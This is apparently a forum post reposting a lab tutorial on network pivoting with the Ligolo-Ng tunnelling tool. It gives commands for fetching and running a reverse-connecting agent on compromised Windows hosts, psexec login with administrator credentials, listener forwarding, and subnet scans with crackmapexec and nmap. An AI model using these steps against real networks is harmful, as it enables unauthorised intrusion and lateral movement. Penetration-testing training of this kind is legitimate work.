x32x01
  • by x32x01 ||
This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool’s unique features to practical applications such as single and double pivoting within a network.

Download Ligolo-Ng:​

Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.

Table of Contents:
  1. Introduction to Ligolo-Ng
  2. Ligolo V/S Chisel
  3. Lab Setup
  4. Prerequisites
  5. Setting up Ligolo-Ng
  6. Single Pivoting
  7. Double Pivoting

Ligolo-Ng Overview:​

Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.

Ligolo V/S Chisel:​

  • Ligolo-Ng outperforms Chisel in terms of speed and customization options.
  • Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
  • Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
  • Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.

Lab Setup​

Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.
001.png
Prerequisites
Obtain the Ligolo ‘agent’ file for Windows 64-bit and the ‘proxy’ file for Linux 64-bit.

Install the ‘agent’ file on the target machine and the ‘proxy’ file on the attacking machine (Kali Linux).
002.png

Setting up Ligolo-Ng​

Step 1: Following the acquisition of both the agent and proxy files, the next step involves the setup of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the ‘ifconfig’ command is employed. To initiate activation, execute the prescribed sequence of commands as follows:
Code:
ip tuntap add user root mode tun ligolo
ip link set ligolo up

Verify Ligolo-Ng activation with: ‘ifconfig’ command
003.png

Step2: Unzip the Ligolo proxy file:
Code:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz

This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the ‘help’ command
Code:
./proxy -h
004.png
Step 3: The options displayed in the preceding image are designed for incorporating various types of certificates with the proxy. The chosen approach involves utilizing the ‘-selfcert’ option, which operates on port 11601. Execute the provided command, as illustrated in the accompanying image below:
Code:
./proxy -selfcert
005.png
Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command:
Code:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip

To facilitate the transmission of this agent file to the target, establish a server with the command:
Code:
updog -p 80
006.png
Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands:
Code:
cd Desktop
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
007.png
Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file.
Code:
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
008.png
Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the ‘session’ command, opting for ‘1’ to access the active session. Following the session establishment, execute the ‘ifconfig’ command as illustrated in the provided image.

Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.
009.png

Single Pivoting​

In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network
010.png
Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due to different network configuration.
011.png
To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands:
Code:
ip route add 192.168.148.0/24 dev ligolo
ip route list
012.png
Return to the Ligolo proxy session window and initiate the tunneling process by entering the ‘start’ command, as demonstrated in the provided image.
013.png
Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.
014.png
Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.
015.png

Double Pivoting​

In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.
016.png
From the newly opened terminal window, utilize the Impacket tool to access the identified Windows 10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download the Ligolo agent onto Windows 10
Code:
impacket-psexec administrator:[email protected]
cd c:\users\public
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
017.png
Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational.
Code:
agent.exe -connect 192.168.1.5:11601 -ignore-cert
18.png
Examine Ligolo-ng proxy server, a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the ‘start’ command to initiate additional tunnelling.
019.png
Execute the ‘session’ command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the ‘ifconfig’ command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.
020.png
Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C.
021.png
Add the Network C Subnet in the IP route list with the following command.
Code:
ip route add 192.168.159.0/24 dev ligolo
ip route list
022.png
With the modification of our IP route, the next step involves the addition of a listener to traverse the intra-network and retrieve the session. To incorporate the listener, utilize the following command:
Code:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
023.png
The image above confirms the activation of the listener. To initiate tunneling, refer to available options using the help command. It becomes evident that halting the ongoing tunneling in session 1 is necessary before starting the process in session 2. This step-by-step approach facilitates the transfer of data to the listener, which subsequently retrieves the necessary information. This operational technique, known as double pivoting, involves stopping the initial tunneling in the first session using the ‘stop‘ command. In second session, execute the ‘start‘ command, following the steps illustrated in the image below.
024.png
Executing double pivoting was successful, and its verification occurred through the utilization of crackmapexec with the command:
Code:
crackmapexec smb 192.168.159.0/24

Discovering Metasploitable2 within the network followed. This led to the ability to conduct a ping and nmap scan, leveraging the acquired network access, as illustrated in the image below:
025.png
 

Similar Threads

x32x01
  • x32x01
Replies
0
Views
169
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
195
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
179
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
146
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
318
x32x01
x32x01
TAGs: Tags
ligolo-ng
Back
Top